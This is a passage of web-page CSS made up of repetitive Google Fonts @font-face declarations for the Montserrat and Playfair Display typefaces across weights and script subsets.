U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, 